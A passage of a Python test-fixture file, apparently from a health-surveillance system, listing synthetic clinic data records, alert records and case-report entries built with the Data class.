Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_66": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b75', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_67": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b76', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_1": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b77', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_2": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b78', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_3": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b79', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_4": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b80', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_5": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b81', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_6": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b82', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_7": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b83', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_8": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b84', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_9": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b85', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_1": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b86', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_2": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b87', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_3": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b88', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_4": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b89', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_5": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b90', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_6": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b91', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_7": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b92', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_8": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b93', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_9": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b94', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_10": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b95', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_11": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b96', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_12": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b97', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_13": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b98', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_14": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b99', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_15": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b100', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_16": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b101', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_17": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b102', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_18": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b103', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_19": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b104', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_20": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b105', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_21": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b106', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_22": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b107', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_23": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b108', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_24": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b109', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_25": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b110', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_26": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b111', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_27": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b112', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_28": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b113', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_29": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b114', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_30": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b115', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_31": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b116', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_32": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b117', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_33": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b118', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_34": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b119', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_35": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b120', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_36": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b121', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_37": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b122', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_38": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b123', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_39": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b124', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_40": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b125', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_41": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b126', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_42": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b127', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_43": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b128', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_44": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b129', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_45": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b130', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_46": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b131', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_47": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b132', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_48": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b133', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_49": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b134', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_50": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b135', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_51": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b136', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_52": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b137', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_53": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b138', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_54": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b139', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_55": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b140', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_56": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b141', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_57": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b142', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_58": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b143', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_59": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b144', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_60": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b145', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_61": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b146', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_62": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b147', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_63": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b148', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_64": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b149', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_65": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b150', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_66": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b151', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_67": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b152', 'country': 1})]
alerts = [
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9341', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce9341", "alert_reason": "cmd_11", "alert_gender": "female", "alert_age": '33', "ale_1": 1,"ale_2":1, "ale_6": 1, "ale_7": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 28, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9342', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_1", "alert_gender": "female", "alert_age": '33'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 55, 16, 49059)}),
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9343', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_2", "alert_gender": "female", "alert_age": '33'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 27, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9344', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_2", "alert_gender": "female", "alert_age": '33', "ale_1": 1, "ale_4": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 27, 23, 54, 16, 49059)}) ,
DisregardedData(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9345', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_11", "alert_gender": "female", "alert_age": '33', "ale_1": 1213, "ale_3": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 28, 23, 54, 16, 49059)}) ,
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9346', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_11", "alert_gender": "female", "alert_age": '33', }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 3, 4, 23, 54, 16, 49059)}) ,
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9347', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_11", "alert_gender": "female", "alert_age": '33',}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}) ,
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9348', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_19", "alert_gender": "female", "alert_age": '33'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 20, 23, 54, 16, 49059)})
]
cd_report = [
Data(**{"variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_11", "ale_1": 1, "ale_2": 1}, 'clinic': 7, 'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9341', 'date': datetime.datetime(2015, 5, 1, 0, 0), 'region': 2, 'country': 1}),
Data(**{"variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_11"}, 'clinic': 7, 'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9342', 'date': datetime.datetime(2015, 5, 2, 0, 0), 'region': 2, 'country': 1}),
# Data(**{ "variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_11"}, 'clinic': 7, 'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9343', 'date': datetime.datetime(2015, 5, 3, 0, 0), 'region': 2, 'country': 1}),
Data(**{ "variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_11"}, 'clinic': 7, 'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9344', 'date': datetime.datetime(2015, 5, 3, 0, 0), 'region': 2, 'country': 1}),
Data(**{ "variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_1"}, 'clinic': 10, 'uuid': 'uuid:20b2022f-fbe7-43cb-8467-c569397f3f68', 'date': datetime.datetime(2015, 4, 18, 0, 0), 'region': 2, 'country': 1}),
Data(**{ "variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_1"}, 'clinic': 10, 'uuid': 'uuid:20b2022f-fbe7-43cb-8467-c569397f3f68', 'date': datetime.datetime(2014, 4, 20, 0, 0), 'region': 2, 'country': 1}),
Data(**{"variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_2"}, 'clinic': 7, 'uuid': 'uuid:c51ea7a2-5e2d-4c83-a9a9-85cce0928509', 'date': datetime.datetime(2015, 3, 2, 0, 0), 'region': 2, 'country': 1}),
Data(**{"variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_2"}, 'clinic': 7, 'uuid': 'uuid:c51ea7a2-5e2d-4c83-a9a9-85cce0928510', 'date': datetime.datetime(2015, 5, 2, 0, 0), 'region': 2, 'country': 1}),
Data(**{"variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_19"}, 'clinic': 11, 'uuid': 'uuid:e4e92687-e7e1-4eff-9ec3-4f45421c1e93', 'date': datetime.datetime(2016, 4, 20, 0, 0), 'region': 3, 'country': 1})
]
vaccination_report = [
Data(**{
'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6,
